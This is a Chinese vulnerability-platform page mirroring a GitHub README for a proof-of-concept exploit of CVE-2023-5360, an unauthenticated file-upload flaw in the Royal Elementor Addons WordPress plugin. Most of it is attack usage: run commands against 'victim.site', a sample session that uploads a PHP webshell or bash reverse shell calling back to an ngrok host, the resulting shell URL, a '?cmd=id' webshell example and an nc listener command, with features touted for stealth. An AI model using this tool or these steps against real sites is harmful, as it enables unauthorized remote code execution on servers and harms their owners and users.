漏洞平台

POC详情： 2b04cbce1d12a3193ad7688b123c4fa1665e91b2

来源

https://github.com/X3RX3SSec/CVE-2023-5360

关联漏洞

标题： WordPress Plugin Royal Elementor Addons and Templates 代码问题漏洞 (CVE-2023-5360)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Royal Elementor Addons and Templates 1.3.79 版本之前存在代码问题漏洞，该漏洞源于无法正确验证上传的文件，这可能导致远程代码执行。

描述

Royal Elementor Addons - Unauthenticated Remote Code Execution

介绍

# CVE-2023-5360 Elementor File Upload Exploit

The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.

```
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S
```

## Description

This is a proof-of-concept exploit for **CVE-2023-5360**, a file upload vulnerability in Elementor Pro for WordPress.
It allows an unauthenticated attacker to upload arbitrary PHP files and gain remote code execution.

## Features

- Grab Elementor nonce automatically
- Upload a simple webshell or reverse shell
- Unique filenames for stealth
- Optional Netcat listener helper
- Sexy AF

## Usage

```bash
python3 CVE-2023-5360.py <https://victim.site/>
```

Example:

```bash
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣
```

Payload options:
1. Simple command webshell (`?cmd=id`  as in: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
2. Reverse shell (Bash)

## Dependencies

- Python 3.x
- `requests` module

Install dependencies:

```bash
pip install requests
```

## Example listener

```bash
nc -lvnp 1337
```

## Disclaimer

This exploit is for educational and authorized security testing only.
You are responsible for how you use it.
Test only on systems you own or have permission to test.

## Credits

**Author:** X3RX3S
CVE-2023-5360

文件快照


 [4.0K]  /data/pocs/2b04cbce1d12a3193ad7688b123c4fa1665e91b2
├── [4.8K]  CVE-2023-5360.py
└── [3.1K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。